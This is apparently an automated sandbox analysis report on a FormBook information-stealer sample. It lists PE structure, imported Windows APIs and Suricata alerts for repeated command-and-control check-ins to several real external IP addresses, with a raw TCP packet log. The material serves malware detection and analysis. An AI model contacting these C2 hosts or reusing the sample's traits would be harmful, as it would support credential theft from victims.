                                                    test esi, 00000007h
                                                    je 00007FCB112AAC85h
                                                    bt esi, 03h
                                                    jnc 00007FCB112AACD8h
                                                    movdqa xmm1, dqword ptr [esi+00h]

                                                    Rich Headers

                                                    Programming Language:
                                                    • [ C ] VS2008 SP1 build 30729
                                                    • [IMP] VS2008 SP1 build 30729
                                                    • [ASM] VS2012 UPD4 build 61030
                                                    • [RES] VS2012 UPD4 build 61030
                                                    • [LNK] VS2012 UPD4 build 61030

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x5dcac.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1220000x6c4c.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc0xc40000x5dcac0x5de00143e7bb5584cf7f76abfe4587e95887eFalse0.929833139147803data7.8989860461691785IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0x1220000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                    RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                    RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                    RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                    RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                    RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                    RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                    RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                    RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                    RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                    RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                    RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                    RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                    RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                    RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                    RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                    RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                    RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                    RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                    RT_RCDATA0xcc7b80x54fb1data1.0003332557651812
                                                    RT_GROUP_ICON0x12176c0x76dataEnglishGreat Britain0.6610169491525424
                                                    RT_GROUP_ICON0x1217e40x14dataEnglishGreat Britain1.25
                                                    RT_GROUP_ICON0x1217f80x14dataEnglishGreat Britain1.15
                                                    RT_GROUP_ICON0x12180c0x14dataEnglishGreat Britain1.25
                                                    RT_VERSION0x1218200xdcdataEnglishGreat Britain0.6181818181818182
                                                    RT_MANIFEST0x1218fc0x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                                    Imports

                                                    DLLImport
                                                    WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                    VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                    COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                    MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                    WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                    PSAPI.DLLGetProcessMemoryInfo
                                                    IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                    USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                    UxTheme.dllIsThemeActive
                                                    KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                    USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                    GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                    COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                    ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                    SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                    OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                                                    Possible Origin

                                                    Language of compilation systemCountry where language is spokenMap
                                                    EnglishGreat Britain

                                                    Network Behavior

                                                    Suricata IDS Alerts

                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2024-11-21T16:17:42.074240+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549801154.12.28.18480TCP
                                                    2024-11-21T16:17:42.074240+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549801154.12.28.18480TCP
                                                    2024-11-21T16:17:48.785814+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549977104.21.41.7480TCP
                                                    2024-11-21T16:17:51.563396+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549978104.21.41.7480TCP
                                                    2024-11-21T16:17:54.274176+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549979104.21.41.7480TCP
                                                    2024-11-21T16:17:56.788087+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549980104.21.41.7480TCP
                                                    2024-11-21T16:17:56.788087+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549980104.21.41.7480TCP
                                                    2024-11-21T16:18:03.848431+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549981172.67.167.14680TCP
                                                    2024-11-21T16:18:06.502736+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549982172.67.167.14680TCP
                                                    2024-11-21T16:18:09.180543+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549983172.67.167.14680TCP
                                                    2024-11-21T16:18:11.891178+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549984172.67.167.14680TCP
                                                    2024-11-21T16:18:11.891178+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549984172.67.167.14680TCP
                                                    2024-11-21T16:18:19.133474+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549985216.40.34.4180TCP
                                                    2024-11-21T16:18:21.717739+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549986216.40.34.4180TCP
                                                    2024-11-21T16:18:24.520226+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549987216.40.34.4180TCP
                                                    2024-11-21T16:18:27.090850+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549988216.40.34.4180TCP
                                                    2024-11-21T16:18:27.090850+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549988216.40.34.4180TCP
                                                    2024-11-21T16:18:34.167613+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54998913.248.169.4880TCP
                                                    2024-11-21T16:18:36.605188+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54999013.248.169.4880TCP
                                                    2024-11-21T16:18:39.226917+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54999113.248.169.4880TCP
                                                    2024-11-21T16:18:41.990763+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54999213.248.169.4880TCP
                                                    2024-11-21T16:18:41.990763+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54999213.248.169.4880TCP
                                                    2024-11-21T16:18:49.052658+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549993209.74.77.10880TCP
                                                    2024-11-21T16:18:51.738208+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549994209.74.77.10880TCP
                                                    2024-11-21T16:18:54.457347+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549995209.74.77.10880TCP
                                                    2024-11-21T16:18:57.059059+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549996209.74.77.10880TCP
                                                    2024-11-21T16:18:57.059059+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549996209.74.77.10880TCP
                                                    2024-11-21T16:19:04.676553+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54999738.47.232.19480TCP
                                                    2024-11-21T16:19:07.346492+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54999838.47.232.19480TCP
                                                    2024-11-21T16:19:10.018402+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54999938.47.232.19480TCP
                                                    2024-11-21T16:19:12.686987+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55000038.47.232.19480TCP
                                                    2024-11-21T16:19:12.686987+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55000038.47.232.19480TCP

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Nov 21, 2024 16:15:58.035043955 CET4980180192.168.2.5154.12.28.184
                                                    Nov 21, 2024 16:15:58.154876947 CET8049801154.12.28.184192.168.2.5
                                                    Nov 21, 2024 16:15:58.154974937 CET4980180192.168.2.5154.12.28.184
                                                    Nov 21, 2024 16:15:58.165290117 CET4980180192.168.2.5154.12.28.184
                                                    Nov 21, 2024 16:15:58.288722992 CET8049801154.12.28.184192.168.2.5
                                                    Nov 21, 2024 16:17:42.073976994 CET8049801154.12.28.184192.168.2.5
                                                    Nov 21, 2024 16:17:42.074181080 CET8049801154.12.28.184192.168.2.5
                                                    Nov 21, 2024 16:17:42.074239969 CET4980180192.168.2.5154.12.28.184
                                                    Nov 21, 2024 16:17:42.078967094 CET4980180192.168.2.5154.12.28.184
                                                    Nov 21, 2024 16:17:42.290607929 CET8049801154.12.28.184192.168.2.5
                                                    Nov 21, 2024 16:17:47.489363909 CET4997780192.168.2.5104.21.41.74
                                                    Nov 21, 2024 16:17:47.608995914 CET8049977104.21.41.74192.168.2.5
                                                    Nov 21, 2024 16:17:47.609164953 CET4997780192.168.2.5104.21.41.74
                                                    Nov 21, 2024 16:17:47.623888016 CET4997780192.168.2.5104.21.41.74
                                                    Nov 21, 2024 16:17:47.743900061 CET8049977104.21.41.74192.168.2.5
                                                    Nov 21, 2024 16:17:48.784892082 CET8049977104.21.41.74192.168.2.5
                                                    Nov 21, 2024 16:17:48.785738945 CET8049977104.21.41.74192.168.2.5
                                                    Nov 21, 2024 16:17:48.785814047 CET4997780192.168.2.5104.21.41.74
                                                    Nov 21, 2024 16:17:49.127779007 CET4997780192.168.2.5104.21.41.74
                                                    Nov 21, 2024 16:17:50.147542000 CET4997880192.168.2.5104.21.41.74
                                                    Nov 21, 2024 16:17:50.267138958 CET8049978104.21.41.74192.168.2.5
                                                    Nov 21, 2024 16:17:50.267227888 CET4997880192.168.2.5104.21.41.74
                                                    Nov 21, 2024 16:17:50.282717943 CET4997880192.168.2.5104.21.41.74
                                                    Nov 21, 2024 16:17:50.402280092 CET8049978104.21.41.74192.168.2.5
                                                    Nov 21, 2024 16:17:51.562854052 CET8049978104.21.41.74192.168.2.5
                                                    Nov 21, 2024 16:17:51.563267946 CET8049978104.21.41.74192.168.2.5
                                                    Nov 21, 2024 16:17:51.563395977 CET4997880192.168.2.5104.21.41.74
                                                    Nov 21, 2024 16:17:51.783941984 CET4997880192.168.2.5104.21.41.74
                                                    Nov 21, 2024 16:17:52.803395033 CET4997980192.168.2.5104.21.41.74
                                                    Nov 21, 2024 16:17:52.922980070 CET8049979104.21.41.74192.168.2.5
                                                    Nov 21, 2024 16:17:52.923062086 CET4997980192.168.2.5104.21.41.74
                                                    Nov 21, 2024 16:17:52.938513041 CET4997980192.168.2.5104.21.41.74
                                                    Nov 21, 2024 16:17:53.058455944 CET8049979104.21.41.74192.168.2.5
                                                    Nov 21, 2024 16:17:53.058577061 CET8049979104.21.41.74192.168.2.5
                                                    Nov 21, 2024 16:17:54.262159109 CET8049979104.21.41.74192.168.2.5
                                                    Nov 21, 2024 16:17:54.274122000 CET8049979104.21.41.74192.168.2.5
                                                    Nov 21, 2024 16:17:54.274175882 CET4997980192.168.2.5104.21.41.74
                                                    Nov 21, 2024 16:17:54.440227985 CET4997980192.168.2.5104.21.41.74
                                                    Nov 21, 2024 16:17:55.460433006 CET4998080192.168.2.5104.21.41.74
                                                    Nov 21, 2024 16:17:55.583051920 CET8049980104.21.41.74192.168.2.5
                                                    Nov 21, 2024 16:17:55.583213091 CET4998080192.168.2.5104.21.41.74
                                                    Nov 21, 2024 16:17:55.592168093 CET4998080192.168.2.5104.21.41.74
                                                    Nov 21, 2024 16:17:55.712119102 CET8049980104.21.41.74192.168.2.5
                                                    Nov 21, 2024 16:17:56.786237001 CET8049980104.21.41.74192.168.2.5
                                                    Nov 21, 2024 16:17:56.788021088 CET8049980104.21.41.74192.168.2.5
                                                    Nov 21, 2024 16:17:56.788086891 CET4998080192.168.2.5104.21.41.74
                                                    Nov 21, 2024 16:17:56.789314032 CET4998080192.168.2.5104.21.41.74
                                                    Nov 21, 2024 16:17:56.909169912 CET8049980104.21.41.74192.168.2.5
                                                    Nov 21, 2024 16:18:02.199410915 CET4998180192.168.2.5172.67.167.146
                                                    Nov 21, 2024 16:18:02.319070101 CET8049981172.67.167.146192.168.2.5
                                                    Nov 21, 2024 16:18:02.319153070 CET4998180192.168.2.5172.67.167.146
                                                    Nov 21, 2024 16:18:02.336956024 CET4998180192.168.2.5172.67.167.146
                                                    Nov 21, 2024 16:18:02.456839085 CET8049981172.67.167.146192.168.2.5
                                                    Nov 21, 2024 16:18:03.848431110 CET4998180192.168.2.5172.67.167.146
                                                    Nov 21, 2024 16:18:03.856549978 CET8049981172.67.167.146192.168.2.5
                                                    Nov 21, 2024 16:18:03.856734037 CET4998180192.168.2.5172.67.167.146
                                                    Nov 21, 2024 16:18:03.857044935 CET8049981172.67.167.146192.168.2.5
                                                    Nov 21, 2024 16:18:03.857168913 CET4998180192.168.2.5172.67.167.146
                                                    Nov 21, 2024 16:18:03.968358040 CET8049981172.67.167.146192.168.2.5
                                                    Nov 21, 2024 16:18:03.968537092 CET4998180192.168.2.5172.67.167.146
                                                    Nov 21, 2024 16:18:04.865345955 CET4998280192.168.2.5172.67.167.146
                                                    Nov 21, 2024 16:18:04.985363960 CET8049982172.67.167.146192.168.2.5
                                                    Nov 21, 2024 16:18:04.985450029 CET4998280192.168.2.5172.67.167.146
                                                    Nov 21, 2024 16:18:05.000088930 CET4998280192.168.2.5172.67.167.146
                                                    Nov 21, 2024 16:18:05.119626045 CET8049982172.67.167.146192.168.2.5
                                                    Nov 21, 2024 16:18:06.502736092 CET4998280192.168.2.5172.67.167.146
                                                    Nov 21, 2024 16:18:06.541604042 CET8049982172.67.167.146192.168.2.5
                                                    Nov 21, 2024 16:18:06.541707039 CET4998280192.168.2.5172.67.167.146
                                                    Nov 21, 2024 16:18:06.542655945 CET8049982172.67.167.146192.168.2.5
                                                    Nov 21, 2024 16:18:06.542752028 CET4998280192.168.2.5172.67.167.146
                                                    Nov 21, 2024 16:18:06.623425007 CET8049982172.67.167.146192.168.2.5
                                                    Nov 21, 2024 16:18:06.623542070 CET4998280192.168.2.5172.67.167.146
                                                    Nov 21, 2024 16:18:07.521666050 CET4998380192.168.2.5172.67.167.146
                                                    Nov 21, 2024 16:18:07.641248941 CET8049983172.67.167.146192.168.2.5
                                                    Nov 21, 2024 16:18:07.641329050 CET4998380192.168.2.5172.67.167.146
                                                    Nov 21, 2024 16:18:07.658329010 CET4998380192.168.2.5172.67.167.146
                                                    Nov 21, 2024 16:18:07.777932882 CET8049983172.67.167.146192.168.2.5
                                                    Nov 21, 2024 16:18:07.778012037 CET8049983172.67.167.146192.168.2.5
                                                    Nov 21, 2024 16:18:09.180542946 CET4998380192.168.2.5172.67.167.146
                                                    Nov 21, 2024 16:18:09.181600094 CET8049983172.67.167.146192.168.2.5
                                                    Nov 21, 2024 16:18:09.181658983 CET4998380192.168.2.5172.67.167.146
                                                    Nov 21, 2024 16:18:09.183003902 CET8049983172.67.167.146192.168.2.5
                                                    Nov 21, 2024 16:18:09.183070898 CET4998380192.168.2.5172.67.167.146
                                                    Nov 21, 2024 16:18:09.300522089 CET8049983172.67.167.146192.168.2.5
                                                    Nov 21, 2024 16:18:09.300678015 CET4998380192.168.2.5172.67.167.146
                                                    Nov 21, 2024 16:18:10.194360971 CET4998480192.168.2.5172.67.167.146
                                                    Nov 21, 2024 16:18:10.314644098 CET8049984172.67.167.146192.168.2.5
                                                    Nov 21, 2024 16:18:10.320231915 CET4998480192.168.2.5172.67.167.146
                                                    Nov 21, 2024 16:18:10.330718994 CET4998480192.168.2.5172.67.167.146
                                                    Nov 21, 2024 16:18:10.450337887 CET8049984172.67.167.146192.168.2.5
                                                    Nov 21, 2024 16:18:11.890003920 CET8049984172.67.167.146192.168.2.5
                                                    Nov 21, 2024 16:18:11.891117096 CET8049984172.67.167.146192.168.2.5
                                                    Nov 21, 2024 16:18:11.891177893 CET4998480192.168.2.5172.67.167.146
                                                    Nov 21, 2024 16:18:11.891324997 CET8049984172.67.167.146192.168.2.5
                                                    Nov 21, 2024 16:18:11.891408920 CET4998480192.168.2.5172.67.167.146
                                                    Nov 21, 2024 16:18:11.903875113 CET4998480192.168.2.5172.67.167.146
                                                    Nov 21, 2024 16:18:12.024676085 CET8049984172.67.167.146192.168.2.5
                                                    Nov 21, 2024 16:18:17.770220995 CET4998580192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:17.890223980 CET8049985216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:17.890307903 CET4998580192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:17.907258034 CET4998580192.168.2.5216.40.34.41
                                                    Nov 21, 2024 16:18:18.029438019 CET8049985216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:19.133342981 CET8049985216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:19.133421898 CET8049985216.40.34.41192.168.2.5
                                                    Nov 21, 2024 16:18:19.133474112 CET4998580192.168.2.5216.40.34.41
